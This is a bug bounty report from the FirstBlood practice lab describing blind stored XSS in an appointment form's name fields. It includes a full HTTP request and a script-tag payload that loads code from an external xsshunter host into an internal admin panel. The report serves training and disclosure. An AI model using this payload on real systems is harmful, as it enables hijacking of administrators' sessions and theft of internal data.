FirstBlood-#1729 — Blind XSS in appointments
This issue was discovered on FirstBlood v3
On 2022-12-14, pichik Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello doctor Sean,
DESCRIPTION:
I found that appointment params are vulnerable to blind XSS and executed internaly.
The vulnerable params are fname and lname.
There is no filtering nor encoding, so payload is simple as "><script+src=https://xsshunter.ht></script>.
It will trigger if address in appointment was not found and an attempt to call failed, but can not tell if these are the only requirements.
Here is the request:
POST /api/ba.php HTTP/1.1
Host: 9f0fae8ab2d6-pichik.a.firstbloodhackers.com
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 27138-7496-80253
&address=test&city=test&phonenumber=test&email=test&dob=test&a1=&a2=&a3=&message=&slot=&drId=1&ambulance=1&status=&fname="><script+src=https://xsshunter.ht></script>&lname="><script+src=https://xsshunter.ht></script>
POC SCREEN:
Here is screenshot from internal endpoint:
IMPACT:
Attacker can access internal information with this XSS.
REMEDIATION:
HTML encode all user input to prevent XSS.
P1 CRITICAL
Endpoint: /api/ba.php
Parameter: lname,fname
Payload: "><script+src=https://xsshunter.ht></script>
FirstBlood ID: 78
Vulnerability Type: Stored XSS
When booking an appointment with the ambulance value set to "1", the users full name is vulnerable to stored XSS on the internal admin panel "firstblood-helper.com"